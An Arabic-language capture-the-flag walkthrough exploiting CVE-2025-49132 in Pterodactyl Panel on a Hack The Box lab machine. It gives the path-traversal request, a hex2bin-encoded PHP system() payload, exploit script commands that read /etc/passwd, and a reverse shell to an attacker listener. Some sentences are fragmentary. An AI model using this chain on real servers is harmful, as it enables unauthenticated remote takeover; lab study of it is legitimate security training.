
استغلال RCE غير مصادق عليه للوحة Pterodactyl (CVE-2025-49132) يجمع بين اجتياز المسار وحقن أوامر PEAR لتنفيذ كود PHP عشوائي على الخوادم الضعيفة.
HTB Season 10 - شرح جهاز Pterodactyl
الهدف: جهاز Pterodactyl HTB (مستوى متوسط)
CVE: CVE-2025-49132
الخطورة: حرجة (CVSS 9.8)
نوع الهجوم: تنفيذ أوامر عن بُعد بدون مصادقة
المتأثر: لوحة Pterodactyl الإصدار < v1.11.11
تجمّع سلسلة الاستغلال هذه:
يسمح نقطة النهاية /locales/locale.json في لوحة Pterodactyl باجتياز المسار من خلال معامل locale:
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd
ويمكن ربط ذلك مع pearcmd.php الخاص بـ PEAR من أجل:
/tmpPEAR (PHP Extension and Application Repository) يحتوي على أداة سطر أوامر (pearcmd.php) التي:
config-create يقوم بكتابة ملفاتسلسلة الاستغلال:
اجتياز المسار → تحميل pearcmd.php → حقن PHP عبر config-create → تنفيذ PHP الخبيث
يتم ترميز الأوامر باستخدام hex2bin() لتجاوز:
مثال:
الأمر: whoami
الست عشري: 77686f616d69
الحمولة: <?=system(hex2bin('77686f616d69'))?>
الطريقة: باستخدام exploit.sh المقدم
chmod +x exploit.sh
# الحصول على علم المستخدم
./exploit.sh flag
# تنفيذ الأوامر
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"
# صلة عكسية
nc -lvnp 4444 # على جهاز المهاجم
./exploit.sh shell 10.10.14.21 4444